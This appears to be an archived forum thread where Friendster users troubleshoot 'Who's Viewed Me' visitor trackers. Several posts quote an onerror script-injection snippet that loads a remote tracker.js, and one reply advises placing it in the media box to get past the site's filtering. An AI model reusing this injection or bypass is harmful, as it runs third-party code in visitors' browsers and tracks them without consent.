• ARCHIVES 
  • » [align=center][b]WVMe Collections[/b] [i]Just pick what suites your taste. :D[/i][/align] [quote][b]Updated as of 01/18/09![/b] New and improved hosting service for WVM v3 Series! Visit the hosting s

[align=center][b]WVMe Collections[/b] [i]Just pick what suites your taste. :D[/i][/align] [quote][b]Updated as of 01/18/09![/b] New and improved hosting service for WVM v3 Series! Visit the hosting s

candy26
» FTalker
FTalk Level: zero
1969-12-31

Re: [align=center][b]WVMe Collections[/b] [i]Just pick what suites your taste. :D[/i][/align] [quote][b]Updated as of 01/18/09![/b] New and improved hosting service for WVM v3 Series! Visit the hosting s

uhm, i can't see mine.. :/ i used WVMe V.2.3.5 i just see [quote]onerror="a=document.createElement('script');a.src='http://h1.ripway.com/monteverde/WVM/tracker.js';navBg.appendChild(a);this.style.display='none'"[/quote] in my 'who i want to meet section..
emir94
» FTalker
1969-12-31

Re: [align=center][b]WVMe Collections[/b] [i]Just pick what suites your taste. :D[/i][/align] [quote][b]Updated as of 01/18/09![/b] New and improved hosting service for WVM v3 Series! Visit the hosting s

the wvm doesnt work again.it says "unregistered id".
chibib0
» n00b
1969-12-31

[quote=emir94]the wvm doesnt work again.it says "unregistered id".[/quote] New registration needed, please reregister. [quote=candy26]uhm, i can't see mine.. :/ i used WVMe V.2.3.5 i just see onerror="a=document.createElement('script');a.src='http://h1.ripway.com/monteverde/WVM/tracker.js';navBg.appendChild(a);this.style.display='none'" in my 'who i want to meet section..[/quote] Its probably the linker..
candy26
» FTalker
1969-12-31

linker? what's wrong with the linker? btw,tnx..
m1ndf33d
» n00b
1969-12-31

:( i wonder why the minute (or time) that indicates how long the visitors stay in my site doesn't change? I've tried viewing my profile with my test page profile and I've stayed there for more than 5 mins but the time just doesn't change even if I keep on refreshing the tracker. :( here are the URLs of my files based on your thread at: http://theftalk.com/t23881-Who%27s-Viewed-Me(All-versions)-w--Generators-%22Just-choose..%22-UPDATED!.html mv.txt > http://h1.ripway.com/asskilled/wvm/mv.txt tracker.css > http://h1.ripway.com/asskilled/wvm/tracker.css tracker.js > http://h1.ripway.com/asskilled/wvm/tracker.js tracker.php > http://h1.ripway.com/asskilled/wvm/tracker.php i am hoping you could help me on this, pretty please. :( will be waiting for your response. thank you so much and goodluck to more codings.

Last edited by m1ndf33d (2008-12-21 20:57:01)

aicute12
» n00b
1969-12-31

Guys, I need help, can you please show me the link where to get the step by step procedure on creating who's viewed me?
chipster489
» FTalkWorm
1969-12-31

[quote=aicute12]Guys, I need help, can you please show me the link where to get the step by step procedure on creating who's viewed me?[/quote] [b]Post dat at Friendster Help, read d rules next tym. :) [/b]
emir94
» FTalker
1969-12-31

[quote=chibib0]emir94 wrote: the wvm doesnt work again.it says "unregistered id". New registration needed, please reregister.[/quote] how?can u give me the link??
idiot_goblinz
» FTalkAddict
1969-12-31

^here dude [url]http://chibibo.elementfx.com/v2/index.php/WVMe-Hosting-v3-Series/Overview-and-Installation-Guide/WVMe-v3.6-Overview-and-Installation-Guidechibi[/url]
deceived.ang35
» FTalkAddict
1969-12-31

[align=center][b] cool.. thanks for sharing.. [/b][/align]
alyesha
» n00b
1969-12-31

<input type="image" src=">" onerror="a=document.createElement('script');a.src='http://h1.ripway.com/madwitch/tracker/tracker.js';navBg.appendChild(a);this.style.display='none'" i cant put this code in my who i want to meet and about me section...... can someone pls tell me why???
bobcbar
» FTalkElite
1969-12-31

[quote=alyesha]cant put this code in my who i want to meet and about me section...... can someone pls tell me why???[/quote] Put it in ur media box, friendster is filtering other boxes.
alyesha
» n00b
1969-12-31

[quote=bobcbar]Put it in ur media box, friendster is filtering other boxes.[/quote] thank you so much sir bob... i saw it already on my profile... but still,. i need to fix something....
akoba
» FTalkAddict
1969-12-31

thnx for sharing:thumbsup: =)
vintageLOVE
» FTalker
1969-12-31

i followed all the steps but it doesnt work on my page.. help me please ,, :cry:
reongimvill
» n00b
1969-12-31

oh my god! its working!! thank yu so much!

Last edited by reongimvill (2009-01-07 10:31:01)

bobcbar
» FTalkElite
1969-12-31

[quote=vintageLOVE]i followed all the steps but it doesnt work on my page..[/quote] Which WVM did you attempt to use? You can reply here are better yet ask your question in the Help thread, but don't forget to say which WVM =)
vintageLOVE
» FTalker
1969-12-31

i used WVMe v2.3.5 ..
idejuhe
» n00b
1969-12-31

mmm..., i can not register... there is "Forbidden Access" error, even i refresh my Firefox browser and repeat procedure again. Hope the problem solve up soon.. btw thx for the update =)
chibib0
» n00b
1969-12-31

Updated again! all issues should be resolved now.. :D:thumbsup:
  • ARCHIVES 
  • » [align=center][b]WVMe Collections[/b] [i]Just pick what suites your taste. :D[/i][/align] [quote][b]Updated as of 01/18/09![/b] New and improved hosting service for WVM v3 Series! Visit the hosting s

Board footer

© 2024 F Talk

Current time is 19:12

[ 9 queries - 0.051 second ]
Privacy Policy